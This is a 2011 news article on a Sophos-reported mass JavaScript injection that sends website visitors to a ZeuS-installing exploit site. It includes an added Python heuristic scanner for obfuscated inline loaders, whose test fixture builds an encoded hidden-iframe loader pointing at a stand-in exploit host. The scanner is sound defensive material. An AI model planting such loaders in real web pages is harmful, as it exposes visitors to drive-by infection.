Jul 15, 2011 16:52 GMT  ·  By

Security researchers from Sophos warn of a widespread web injection attack that has infected a large number of websites with code distributing a variant of the notorious Zeus trojan.

"Huge numbers of sites have been injected with a malicious JavaScript that attempts to load content from an exploit site when innocent users browse the affected pages," says Fraser Howard, a principal virus researcher at Sophos.

The injection is very widespread: the malicious code, detected by Sophos as Mal/ObfJS-AB, currently accounts for a quarter of all reported threats.

The attack doesn't appear to be limited to any particular type of website or web server, which suggests that the compromise vector is stolen FTP credentials rather than a vulnerability in one platform (a platform flaw would cluster the victims on that platform).

The payload makes that theory even more likely: ZeuS is an information-stealing trojan known to harvest stored credentials, FTP logins included, so every infected visitor can supply the accounts used to inject the next batch of sites.

The injected code redirects visitors to a third-party page which launches PDF and Java exploits. Successful attacks install a ZeuS variant.

"Perhaps the most interesting thing about this attack is the exploit site JavaScript (the content we block as Mal/ExpJS-N). We have been seeing the same exploit script at the end of spam links and JS/Sinowal-V redirects in recent weeks.

"The script is heavily obfuscated and uses polymorphic and anti-emulation techniques to attempt to evade detection," Howard explains.
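The injected loader described above (an inline script that unpacks an escaped string and writes or loads content from a third-party exploit host) is the kind of thing a webmaster can sweep for with a simple heuristic scanner. The following Python is an added example, not Sophos code and not the Mal/ObfJS-AB signature: it flags inline scripts that combine eval/unescape/document.write with long runs of escaped characters, decodes the one-layer %XX and \xXX encodings such loaders commonly use, and reports which foreign hosts the decoded payload would pull from. The sample pages, the host `exploit-host.invalid` and the site domain `example.com` are constructed for the example.

```python
"""Heuristic scanner for injected JavaScript loaders in HTML pages.

Added example, not the vendor's detection logic.  It targets the *class* of
injection described in the article: an obfuscated inline <script> that
unescapes a packed string and loads content from an exploit host.
"""
import re
from urllib.parse import unquote, urlparse

SCRIPT_RE = re.compile(r"<script\b([^>]*)>(.*?)</script>", re.I | re.S)
SRC_RE = re.compile(r"""\bsrc\s*=\s*["']?([^"'\s>]+)""", re.I)
URL_RE = re.compile(r"https?://[^\s\"'<>]+", re.I)
ESCAPE_RE = re.compile(r"%[0-9a-fA-F]{2}|\\x[0-9a-fA-F]{2}|\\u[0-9a-fA-F]{4}")
# Calls that packed loaders almost always need; plain site code rarely uses several at once.
OBF_CALLS = ("eval(", "unescape(", "String.fromCharCode", "document.write(")


def decode_layer(text):
    """Undo one layer of %XX (JS unescape style) and \\xXX string escapes."""
    text = unquote(text)
    return re.sub(r"\\x([0-9a-fA-F]{2})", lambda m: chr(int(m.group(1), 16)), text)


def scan_html(html, site_host):
    """Return a list of (kind, detail) findings for one page.

    site_host is the domain the page legitimately belongs to; script sources
    and decoded payload URLs pointing anywhere else are reported.
    """
    findings = []
    for attrs, body in SCRIPT_RE.findall(html):
        src = SRC_RE.search(attrs)
        if src:
            host = urlparse(src.group(1)).hostname
            if host and host != site_host:
                findings.append(("external-script", src.group(1)))
            continue
        body = body.strip()
        if not body:
            continue
        calls = [c for c in OBF_CALLS if c in body]
        escapes = len(ESCAPE_RE.findall(body))
        score = len(calls)
        score += 1 if escapes >= 20 else 0                 # long escaped blob
        score += 1 if "\n" not in body and len(body) > 400 else 0  # one packed line
        if score < 2:
            continue
        # Show what the packed layer would actually load, when one decode reveals it.
        hosts = sorted({urlparse(u).hostname for u in URL_RE.findall(decode_layer(body))}
                       - {site_host, None})
        findings.append(("obfuscated-inline-script",
                         {"calls": calls, "escapes": escapes, "loads_from": hosts}))
    return findings


# Constructed sample pages (not real infected content).
_PAYLOAD = '<iframe src="http://exploit-host.invalid/in.php" width="1" height="1"></iframe>'
_ENCODED = "".join("%%%02X" % ord(ch) for ch in _PAYLOAD)  # every byte as %XX
CLEAN_PAGE = """<html><head>
<script src="/js/site.js"></script>
<script>document.getElementById("year").textContent = "2011";</script>
</head><body><h1>Welcome</h1></body></html>"""
INJECTED_PAGE = CLEAN_PAGE.replace(
    "</body>",
    '<script>var _q=unescape("%s");document.write(_q);</script></body>' % _ENCODED)


if __name__ == "__main__":
    for name, page in (("clean", CLEAN_PAGE), ("injected", INJECTED_PAGE)):
        print(name, scan_html(page, "example.com"))
```

The scoring is deliberately coarse: a single `document.write(` or a handful of `%20`s in legitimate code scores below the threshold, while a loader that both unescapes and writes a 20-plus-character escaped blob is reported together with the host it decodes to. Polymorphic variants change the literal bytes but not the need to unpack and execute, so the call/escape combination is a steadier signal than any fixed byte pattern; a multi-layer packer would need `decode_layer` applied repeatedly.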

The researcher notes that the affected websites are spread across different hosting providers, so no single hosting company appears to have been targeted, as has been the case in some earlier mass injection attacks.

Past experience has shown that website infections like these can persist for months because webmasters are slow to react, so the task of protection largely falls to users.

People are strongly advised to keep all of their software up to date, especially the operating system, browsers and their plug-ins (Java, Adobe Reader, Flash Player, etc.). Running an up-to-date antivirus program capable of scanning web traffic is equally important.